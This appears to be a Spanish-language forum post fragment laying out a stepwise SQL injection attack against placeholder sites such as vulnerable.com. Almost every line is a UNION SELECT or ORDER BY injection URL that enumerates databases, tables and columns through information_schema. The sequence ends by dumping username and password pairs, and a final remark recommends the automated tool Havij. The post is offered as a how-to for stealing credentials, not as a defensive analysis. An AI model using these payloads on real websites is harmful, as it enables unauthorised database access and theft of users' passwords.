paginaatacada.com/index.php?id=-1+union+select+table_name,2,3+from+information_schema.tables+limit+1,1
paginaatacada.com/index.php?id=-1+union+select+table_name,2,3+from+information_schema.tables+limit+2,1paginaatacada.com/index.php?id=-1+union+select+table_name,2,3+from+information_schema.tables+limit+3,1
vulnerable.com/index.php?id= 11 ORDER BY 3-- Correctovulnerable.com/index.php?id= 11 ORDER BY 4-- Error
vulnerable.com/index.php?id=-1 UNION SELECT schema_name,2,3 FROM information_schema.schemata--database1users_db...
vulnerable.com/index.php?id=-1 UNION SELECT table_name,2,3 FROM information_schema.tables WHERE table_schema='users_db'--guestbookusers_table...
vulnerable.com/index.php?id=-1 UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_schema='users_db' AND table_name='users_table'--user_nickpasswordmail...
vulnerable.com/index.php?id=-1 UNION SELECT concat(user_nick,0x3A,password),2,3 FROM users_db.users_table--user1:pass1user2:pass2....
vulnerable.com/index.php?id=-1 UNION SELECT group_concat(schema_name separator 0x40),2,3 FROM information_schema.schemata#
Cuando tengas todo los que dijieron dr0x0N y mrobles bien claro, empeza a usar el HAVIJ, te facilita todo, pero si no sabes nada de SQLi no lo uses(sería muy lammer)